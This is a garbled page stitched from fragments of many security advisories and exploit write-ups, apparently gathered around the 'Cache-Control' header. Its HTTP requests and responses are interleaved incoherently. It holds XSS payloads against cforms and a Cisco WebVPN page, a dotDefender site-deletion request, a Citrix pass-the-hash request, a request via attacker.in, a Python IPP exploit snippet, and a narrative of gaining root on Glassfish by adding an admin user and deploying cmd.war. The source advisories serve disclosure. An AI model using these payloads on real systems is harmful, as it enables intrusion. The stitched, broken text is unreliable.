Next Page >>
Cache/Control
2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1
>>>>>>> HTTP/1.1 200 OK
Date: Mon, 27 Aug 2007 18:58:21 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/xml
Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141
Content-Length: 21755
User-Agent: ImageShack Toolbar 4.5.7 ([..])
Host: load9.imageshack.us
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1
--B-O-U-N-D-A-R-Y731553141
Content-Disposition: form-data; name="toolbar"
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR
1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
--- cforms-v11.5/lib_ajax.php 2009-09-18 10:29:06.000000000 +0900
+++ cforms-v11.6.1/lib_ajax.php 2010-09-22 07:41:54.000000000 +0900
@@ -627,16 +627,16 @@
### always modified
header ("Cache-Control: no-cache, must-revalidate"); ### HTTP/1.1
header ("Pragma: no-cache"); ### HTTP/1.0
- $func_name = $_GET["rs"];
+ $func_name = sajax_sanitize( $_GET["rs"] );
if (! empty($_GET["rsargs"]))
- $args = $_GET["rsargs"];
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://172.16.159.132/dotDefender/index.cgi
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
Connection: keep-alive
Referer: https://{IP}/CACHE/sdesktop/install/start.htm
Content-Type: application/xml; charset=UTF-8
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56
Starting, please wait..."><script>alert(1);</script>
RESPONSE:
> Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
> Keep-Alive: 300
> Connection: keep-alive
> Referer: https://172.16.159.132/dotDefender/index.cgi
> Authorization: Basic YWRtaW46
> Cache-Control: max-age=0
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 76
>
> sitename=dotdefeater&deletesitename=dotdefeater&action=deletesite&linenum=14
>
> So what he has "fixed"? See the following diff::
>
> --- cforms-v11.5/lib_ajax.php 2009-09-18 10:29:06.000000000
> +0900 +++ cforms-v11.6.1/lib_ajax.php 2010-09-22
> 07:41:54.000000000 +0900 @@ -627,16 +627,16 @@ ### always
> modified header ("Cache-Control: no-cache, must-revalidate"); ###
> HTTP/1.1 header ("Pragma: no-cache"); ###
> HTTP/1.0 - $func_name = $_GET["rs"]; +
> $func_name = sajax_sanitize( $_GET["rs"] ); if (!
> empty($_GET["rsargs"])) - $args =
> $_GET["rsargs"]; + $args =
COMPLETE HTTP RESPONSE:
HTTP/1.1 302 Moved
location: /dana-na/auth//welcome.cgi?p=&hideremed=1
Pragma: no-cache
Cache-Control: no-store
Expires: -1
Transfer-Encoding: chunked
Status: 500 Internal Error
Content-Type: text/html
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
Date: Thu, 01 Dec 2011 16:42:17 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.2
Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly
Expires: Thu, 01 Dec 2011 16:42:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 01 Dec 2011 16:42:17 GMT
Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly
X-Frame-Options: SAMEORIGIN
X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net
Pragma: no-cache
[ Reference ]
[1] "Divide and Conquer, HTTP Response Splitting, Web Cache
Poisoning Attacks, and Related Topics ", Amit Klein, March 2004.
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
"
HTTP/1.0 200 \r
Date: xxx, xx xxx xxxx xx:xx:xx GMT\r
Pragma: no-cache\r
Cache-Control: no-cache\r
\r
%VALUES%
\0\0\0
\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0
Date: Tue, 20 Oct 2009 09:01:58 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.3 with Suhosin-Patch
mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.3
Pragma: private
Cache-control: private, must-revalidate
Content-Disposition: attachment; filename=cubecartlatest_20Oct09.sql
Content-length: 80864
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream
Anti-Phishing solution.
References
[1] “HTTP Response Splitting, Web Cache Poisoning Attacks, and Related
Topics€? by Amit Klein,
http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Insecure Flash crossdomain.xml
Insecure Silverlight clientaccesspolicy.xml
Charset declarations which could introduce vulnerability (non-UTF-8)
User-controllable charset declarations
Dangerous context-switching between HTTP and HTTPS
Insufficient use of cache-control headers when private data is concerned
(e.g. no-store)
Potential HTTP referer leaks of sensitive user-information
Potential information leaks in URL parameters
Source code comments worth a closer look
Hidden debugging messages from Web and Database servers
identifies the following problems:
CVE-2009-3305
A malicous remote sever could cause polipo to crash by sending an
invalid Cache-Control header.
CVE-2009-4143
A malicous client could cause polipo to crash by sending a large
Content-Length value.
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://host/path
Content-Length: 80
Cookie: PHPSESSID=<my_phpsessid>; eXtplorer=<my_cookie>
Pragma: no-cache
Cache-Control: no-cache
start=0&limit=50&dir=x&option=com_extplorer&action=getdircontents&sendWhat=files
The response is a JSON file:
{"action":"","message":"\/var\/www\/path\/\/x : This directory
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-control: no-cache,max-age=0,must-revalidate
<HTML>
<HEAD>
~ <TITLE>RSA SecurID : Log In</TITLE>
Content-Type: application/x-www-form-urlencoded
User-Agent: C:\PROGRA~1\Citrix\ICACLI~1\PNAMain.exe
Host: xxx.xxx.xxx.xxx
Content-Length: 705
Connection: Keep-Alive
Cache-Control: no-cache
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE NFuseProtocol SYSTEM "NFuse.dtd"><NFuseProtocol version="4.6"><RequestAppData><Scope traverse="onelevel" type="PNFolder">$PRELAUNCH$</Scope><DesiredDetails>permissions</DesiredDetails><DesiredDetails>icon-info</DesiredDetails><DesiredDetails>all</DesiredDetails><ServerType>x</ServerType><ServerType>win32</ServerType><ClientType>ica30</ClientType><ClientType>content</ClientType><Credentials><UserName>domain\myuser</UserName><Password encoding="ctx1">ENCODEDPASSWORDHERE</Password><Domain type="NT"></Domain></Credentials><ClientName>COMPUTER01</ClientName><ClientAddress>xxx.xxx.xxx.xxx</ClientAddress></RequestAppData></NFuseProtocol>
More information on how it works:
http://eelsivart.blogspot.com/2011/12/citrix-receiver-xendesktop-pass-hash.html
Connection: keep-alive
Cookie: sessionid=[...]; cadata="[...]"
And we get a redirection to the website defined:
HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 277
Content-Type: text/html
Expires: Fri, 28 Mar 2008 08:53:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-control: no-cache,max-age=0,must-revalidate
<HTML>
<HEAD>
~ <TITLE>RSA SecurID : Log In</TITLE>
Content-Type: text/x-gwt-rpc; charset=utf-8
User-Agent: GoogleBot/2.1
Host: 192.168.0.1:8014
Content-Length: 149
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: donotshowgettingstarted=%7B%22state%22%3Atrue%7D
5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0|
Note that '2C6B33BED38F825C48AE73C093241510' is a static value
Content-Length: 361
Date: Fri, 05 Feb 2010 08:53:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
[REQUEST]
POST /joomla163/index.php HTTP/1.1
Referer: http://attacker.in/joomla163/
User-Agent: Konqueror/4.5
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: attacker.in
Accept-Encoding: gzip, deflate
Content-Length: 125
> Connection: keep-alive
> Cookie: sessionid=[...]; cadata="[...]"
>
> And we get a redirection to the website defined:
> HTTP/1.1 200 OK
> Cache-Control: No-cache
> Content-Length: 277
> Content-Type: text/html
> Expires: Fri, 28 Mar 2008 08:53:11 GMT
> Server: Microsoft-IIS/6.0
> X-Powered-By: ASP.NET
Wladimir Palant discovered that Firefox did not restrict access to cookies in
HTTP response headers. If a user were tricked into opening a malicious web
page, a remote attacker could view sensitive information. (CVE-2009-0357)
Paul Nel discovered that Firefox did not honor certain Cache-Control HTTP
directives. A local attacker could exploit this to view private data in
improperly cached pages of another user. (CVE-2009-0358)
Updated packages for Ubuntu 8.04 LTS:
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ;
comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam
%40checkpoint.com
Pragma: no-cache
Cache-Control: no-cache
rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#
$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://
www.checkpoint.com$#$<script>alert(1)</script>
http_request += "Content-Type: application/ipp\r\n"
http_request += "User-Agent: Internet Print Provider\r\n"
http_request += "Host: %s\r\n" % self.host
http_request += "Content-Length: %d\r\n" % len(self.ipp_data)
http_request += "Connection: Keep-Alive\r\n"
http_request += "Cache-Control: no-cache\r\n"
return http_request
def get_ipp_request(self):
operation_attr = self.attribute(0x47, 'attributes-charset',
'utf-8')
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.65.78.211:4848/common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&
Content-Length: 0
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
Pragma: no-cache
Cache-Control: no-cache
This created a user called NGSSecure with a password of Password!!
NGS then logged on to the Glassfish administration console using this newly created user. Once logged on as this user it was possible to upload and deploy a website, NGS deployed cmd.war which allowed the user to run commands under the context of the GlassFish server which is root by default.
Next Page>>
|
